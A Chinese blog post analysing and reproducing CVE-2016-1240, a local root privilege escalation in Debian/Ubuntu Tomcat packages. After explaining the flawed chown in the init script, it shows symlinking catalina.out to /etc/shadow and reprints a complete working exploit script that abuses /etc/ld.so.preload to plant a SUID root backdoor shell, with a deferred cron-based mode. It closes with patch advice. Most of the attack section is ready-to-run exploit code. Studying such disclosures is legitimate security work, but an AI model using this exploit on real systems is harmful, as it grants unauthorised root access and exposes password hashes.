CVE-2016-1240(Tomcat本地提权漏洞分析与复现)

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量2.8k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/79567605
版权

前言

       Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。   

     Tomcat于2016年10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。

漏洞分析

 

     Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-1240这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本:/etc/init.d/tocat* 利用该脚本,可导致攻击者通过低权限的Tomcat用户获得系统root权限!

  该问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本,该脚本位于/etc/init.d/tomcat*, 跟踪代码如下:

171  # Run the catalina.sh script as a daemon
172  set +e 
173  touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
174 chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
175 start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" \
176 -c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" \
177 -x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"
178 status="$?"
179 set +a -e

  174行,Tomcat服务在启动时,会将log文件catalina.out的所有者改为Tomcat用户, 而启动脚本通常由root用户调用。如果将catalina.out修改为指向任意文件的链接将会导致攻击者以高权限随意操作任意系统文件。

漏洞影响范围

 

Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

 受影响的系统包括Debian、Ubuntu,其他使用相应deb包的系统也可能受到影响。

漏洞验证

 

 在Windows系统里打开xshell,并连接上虚拟机的ubuntu系统,用tomcat7进行登录:

 

登陆成功,如下图所示:

 

 

 

接下来我们来验证是否可以利用:

当前的用户为tomcat7。这就是说我们能够更改所属用户为tomcat7的catalina.out这个log文件的内容和属性。

更改它的属性,让他指向/etc/shadow/文件夹下,现在我们创建一个指向 /etc/shadow 的符号链接。

使用命令ln -fs /etc/shadow /var/log/tomcat6/catalina.out,这时候就可以在/etc/shadow下创建一个链接,就相当于Windows的快捷方式一样。

此时catalina.out指向shadow文件,打开它相当于打开shadow。

此时我们查看文件cataline.out的内容,发现权限不够,禁止读取cataline.out的内容:

 

接下来转到root用户,重启tomcat,然后再转回tomcat,再次打开cataline.out文件,发现可以成功打开了,成功的查看到了本来需要root权限才能看到的 /etc/shadow 文件中的内容:

 

原理: 当Tomcat服务重启时,系统默认重新加载 /var/log/tomcat6/catalina.out脚本,由于此时tomcat的日志文件指向了 /etc/shadow文件; 而该文件就是我们之前创建的链接文件它此时的组权为root,而链接文件本身属于Tomcat7这个低权限用户,因此,tomcat7这个低权限的用户就可以利用catalina.out查看shadow中的内容了。

从此处可以验证出,利用catalina.out的漏洞,可以实现提权。

使用poc提权 

 使用vim编辑器,在/tmp目录下创建poc.sh文件,把预先准备好的poc文档内容复制进去:

Usage: ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] 

The exploit can used in two ways: 
-active (assumed by default) - which waits for a Tomcat restart in a loop and instantly gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

-deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
Attackers can come back at a later time and check on the /etc/default/locale file. Upon a Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can then add arbitrary commands to the file which will be executed with root privileges by the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default Ubuntu/Debian Tomcat installations).

poc.sh

 

#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a 
# vulnerable java webapp, or locally via weak permissions on webapps in the 
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by 
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
    # Cleanup 
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $TOMCATLOG
    touch $TOMCATLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload 2>/dev/null
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
    cleanexit 0
}

#intro 
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args
if [ $# -lt 1 ]; then
    echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
    exit 3
fi
if [ "$2" = "-deferred" ]; then
    mode="deferred"
else
    mode="active"
fi

# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
    echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
    exit 3
fi

# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
    echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
    exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
    rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
    if [ $? -ne 0 ]; then
        echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
        cleanexit 3
    fi
    echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
    echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
    echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
    echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"
    echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)
 \n\n"
    exit 0
fi

# [ Active exploitation ]

trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
    static uid_t  (*old_geteuid)();
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
    if ( old_geteuid() == 0 ) {
        chown("$BACKDOORPATH", 0, 0);
        chmod("$BACKDOORPATH", 04777);
        unlink("/etc/ld.so.preload");
    }
    return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
    echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
    cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
    echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
    cleanexit 2
fi

# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
    echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
    cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
 "
while :; do 
    sleep 0.1
    if [ -f /etc/ld.so.preload ]; then
        echo $PRIVESCLIB > /etc/ld.so.preload
        break;
    fi
done

# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then 
    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
    echo -e "\n\033[94mPlease tell me you're seeing this too ;)
  \033[0m"
else
    echo -e "\n[!] Failed to get root"
    cleanexit 2
fi

# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p

# Job done.
cleanexit 0

 

接着使用chmod命令修改文件的权限,chmod 755 表示 111 101 101 ,令该文件创建者拥有对文件的读取,写入,执行权限;其他用户可以读和执行该文件。接下来执行文件:

 

文件执行成功,此时正在等待tomcat7的重启,打开另一个终端,用root用户连接ubuntu目标机,重启tomcat7服务,重启之后,提权成功:

 

此时利用whoami命令和id命令可以看到tomcat7已经拥有了root用户的权限,本次漏洞复现完毕

漏洞修复

 

目前,Debian、Ubuntu等相关操作系统厂商已修复并更新受影响的Tomcat安装包。受影响用户可采取以下解决方案:

1、更新Tomcat服务器版本:

(1)针对Ubuntu公告链接 http://www.ubuntu.com/usn/usn-3081-1/

(2)针对Debian公告链接 https://lists.debian.org/debian-security-announce/2016/msg00249.html https://www.debian.org/security/2016/dsa-3669 https://www.debian.org/security/2016/dsa-3670

 

2、加入-h参数防止其他文件所有者被更改,即更改Tomcat的启动脚本为:

 chown -h $TOMCAT6_USER “$CATALINA_PID” “$CATALINA_BASE”/logs/catalina.out

 

FLy_鹏程万里
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2016-1240漏洞分析Tomcat本地提权漏洞
jlvsjp的博客
10-10 6942
前几天刷Freebuf的时候发现了在国庆期间爆了一个Tomcat本地提权漏洞,乍一看漏洞利用脚本是一个shell批处理,想着也不会太难,就抱着学习的目的试着做了分析。以下是本人的分析学习总结。 0x0 漏洞描述 Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-1240这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动
tomcat 漏洞集合
qq_53229503的博客
09-02 7203
tomcat 漏洞集合
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1304
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
CVE-2016-1240 Tomcat 服务本地提权漏洞
weixin_30679823的博客
10-08 151
catalogue 1. 漏洞背景 2. 影响范围 3. 漏洞原理 4. 漏洞PoC 5. 修复方案 1. 漏洞背景 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权...
tomcat 漏洞 CVE-2016-1240 分析报告
dawuafang
10-11 221
这次漏洞是 Debian 自身提供的 tomcat 包的漏洞,也就是 tomcat deb 包的漏洞,并非 tomcat 官方的漏洞。Debian 下使用 apt-get 安装 tomcat 的用户必须提高注意。该包提供做成服务的 tomcat.ini 脚本,该初始化脚本对 catalina.out 做了 chown 操作:touch "$CATALINA_PID" "$CATALINA_BASE...
Tomcat 远程代码执行/提权漏洞(CVE-2019-0232)复现
Ciyaso的博客
05-08 1099
一.漏洞概述 该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想。 触发该漏洞需要同时满足以下条件: 系统为Windows 启用了CGI Servlet(默认为关闭) 启用了enableCmdLineArguments(Tomcat
Tomcat本地提权漏洞
小小猪的博客
11-19 1868
Tomcat本地提权漏洞 漏洞分析: 其实这个漏洞影响范围挺广泛的,基本所有使用了deb包的liunx操作系统都会有受到影响,包括不限于ubuntu,debian等,但是利用条件确实比较苛刻,在实际环境中比较难达到。 这个漏洞的原因就出现在tomcat的安装deb包上,当用户使用apt-get方式安装tomcat时。tomcat程序会自动为管理员安装一个启动脚本/etc/init.d/tocat*,当攻击者通过web或者其他途径拿到tomcat的权限时,就可以任意操作tomcat日志目录下的cata
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
【Apache Tomcat与Session反序列化漏洞CVE-2020-9484详解】 Apache Tomcat是一款广泛使用的开源Web应用服务器,它基于Java,主要用于运行Servlet和JSP(JavaServer Pages)应用程序。在2020年,Tomcat被发现存在一...
tomcat-6.0.45.zip
05-03
tomcat6.0经典版本,解压即用,无需安装
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
tomcat 升级到8.5.99后,系统启动不起来问题(修复 CVE-2024-24549 拒绝访问漏洞
04-16
描述中提到的“在8.5.98基础上,增加了修复CVE-2024-24549拒绝访问漏洞的代码”,这表明Tomcat 8.5.99主要的更新内容是针对一个名为CVE-2024-24549的安全漏洞进行修复。CVE(Common Vulnerabilities and Exposures)...
java漏洞提权_Tomcat最新本地提权漏洞
weixin_31211821的博客
02-13 266
漏洞原理在Debian系统中利用apt-get安装Tomcat时,程序会自动创建一个自动脚本,该脚本位于/etc/init.d/tomcat*,代码如下171#Runthecatalina.shscriptasadaemon172set+e173touch"$CATALINA_PID""$CATALINA_BASE"/logs/catalina.out174cho...
Tomcat 服务本地提权漏洞预警
JackLiu16的博客
02-28 939
10月1日,Tomcat爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的Tomcat用户获得系统的root权限。漏洞相关信息: CVE ID:CVE-2016-1240漏洞原理:在Debian系统的Linux上管理员通常利用apt-get进行包管理,deb包是Unixar的标准归档,讲包文件信息以及包内容,经过gzip和tar打包而成。该问题出在Tomcat的deb包中,使 deb包...
关于Tomcat本地提权漏洞情况的通报
weixin_34397291的博客
09-04 172
本文讲的是关于Tomcat本地提权漏洞情况的通报,近日,互联网上披露了关于Tomcat启动脚本存在本地提权漏洞(CNNVD-201609-410)的情况。在基于deb安装格式的操作系统(如Debian、Ubuntu等)下,使用Tomcat安装包生成的初始化脚本存在此漏洞,具有普通用户权限的攻击者可利用该漏洞修改主机任意文件,在Tomcat重启后可进一步提...
复现CVE-2016-3088
10-15
好的,CVE-2016-3088是一个Apache Struts2框架的漏洞,攻击者可以通过构造恶意请求来执行任意代码。要复现漏洞,可以按照以下步骤进行: 1. 下载Apache Struts2框架,并解压缩。 2. 在解压后的目录中,找到struts...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值